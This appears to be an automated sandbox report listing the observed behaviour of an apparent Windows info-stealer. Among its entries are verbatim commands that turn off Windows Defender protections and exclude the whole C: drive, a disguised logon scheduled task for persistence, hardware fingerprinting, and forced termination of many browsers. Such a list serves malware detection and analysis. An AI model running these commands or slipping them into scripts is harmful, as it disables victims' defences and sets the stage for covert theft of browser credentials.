Technical Information
- <SYSTEM32>\tasks\runtimebroker_startup_524_str
- '<SYSTEM32>\taskkill.exe' /F /IM "brave.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "Brave Browser.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "chrome.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "msedge.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "opera.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "operagx.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "operacrypto.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "vivaldi.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "yandexbrowser.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "iridium.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "slimjet.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "torch.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "amigo.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "kometa.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "orbitum.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "centbrowser.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "7star.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "sputnikbrowser.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "epicprivacybrowser.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "urbrowser.exe"
- '<SYSTEM32>\taskkill.exe' /F /IM "waterfox.exe"
- nul
- %APPDATA%\startup_str_524.exe
- %APPDATA%\startup_str_524.vbs
- %APPDATA%\.noc_id
- '19#.#09.200.173':5000
- DNS ASK ap#.#pify.org
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v AllowRealtimeMonitoring /t REG_DWORD /d 0 /f 2>nul
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v AllowRealtimeMonitoring /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v AllowCloudProtection /t REG_DWORD /d 0 /f 2>nul
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v AllowCloudProtection /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f 2>nul
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v EnableNetworkProtection /t REG_DWORD /d 0 /f 2>nul
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f 2>nul
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\" /t REG_DWORD /d 0 /f 2>nul
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\" /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c wmic bios get serialnumber /value
- '<SYSTEM32>\wbem\wmic.exe' bios get serialnumber /value
- '<SYSTEM32>\cmd.exe' /c wmic computersystem get model /value
- '<SYSTEM32>\wbem\wmic.exe' computersystem get model /value
- '<SYSTEM32>\cmd.exe' /c wmic computersystem get manufacturer,model /value
- '<SYSTEM32>\wbem\wmic.exe' computersystem get manufacturer,model /value
- '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -NonI -Command "Register-ScheduledTask -TaskName 'RuntimeBroker_startup_524_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute ...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonI -Command "Register-ScheduledTask -TaskName 'RuntimeBroker_startup_524_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute '%APPDATA%\sta...
- '<SYSTEM32>\cmd.exe' /c wmic os get Caption /value
- '<SYSTEM32>\wbem\wmic.exe' os get Caption /value
- '<SYSTEM32>\cmd.exe' /c wmic cpu get Name /value
- '<SYSTEM32>\wbem\wmic.exe' cpu get Name /value
- '<SYSTEM32>\cmd.exe' /c wmic path win32_videocontroller get Name /value
- '<SYSTEM32>\wbem\wmic.exe' path win32_videocontroller get Name /value
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "brave.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "Brave Browser.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "chrome.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "msedge.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "opera.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "operagx.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "operacrypto.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "vivaldi.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "yandexbrowser.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "iridium.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "slimjet.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "torch.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "amigo.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "kometa.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "orbitum.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "centbrowser.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "7star.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "sputnikbrowser.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "epicprivacybrowser.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "urbrowser.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "waterfox.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "firefox.exe" 2>nul
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v AllowRealtimeMonitoring /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v AllowCloudProtection /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v EnableNetworkProtection /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\" /t REG_DWORD /d 0 /f 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c wmic bios get serialnumber /value' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c wmic computersystem get model /value' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c wmic computersystem get manufacturer,model /value' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -NoProfile -NonI -Command "Register-ScheduledTask -TaskName 'RuntimeBroker_startup_524_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute ...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c wmic os get Caption /value' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c wmic cpu get Name /value' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c wmic path win32_videocontroller get Name /value' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "brave.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "Brave Browser.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "chrome.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "msedge.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "opera.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "operagx.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "operacrypto.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "vivaldi.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "yandexbrowser.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "iridium.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "slimjet.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "torch.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "amigo.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "kometa.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "orbitum.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "centbrowser.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "7star.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "sputnikbrowser.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "epicprivacybrowser.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "urbrowser.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "waterfox.exe" 2>nul' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /F /IM "firefox.exe" 2>nul' (with hidden window)